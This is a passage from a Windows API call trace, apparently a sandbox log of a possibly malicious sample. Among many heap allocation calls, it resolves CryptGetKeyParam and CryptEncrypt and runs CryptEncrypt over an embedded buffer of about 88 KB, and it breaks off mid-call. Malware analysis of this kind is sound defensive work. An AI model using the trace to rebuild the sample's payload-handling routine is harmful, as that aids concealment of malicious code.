(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0101.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0101.724] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0101.724] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2a20, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a20*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.726] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.726] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.726] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0101.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0101.727] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.785] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x15742, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x15750) returned 1 [0101.786] TranslateMessage (lpMsg=0x144e6a4) returned 0 [0101.786] DispatchMessageW (lpMsg=0x144e6a4) returned 0x0 [0101.786] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0101.786] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0101.786] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.786] CharLowerBuffW (in: lpsz="byte[87889]", cchLength=0xb | out: lpsz="byte[87889]") returned 0xb [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0101.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15751) returned 0x49af758 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0101.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x49c4eb8 [0101.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x49da608 [0101.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0101.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0101.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0101.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0101.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb000 [0101.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.790] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49af758*, 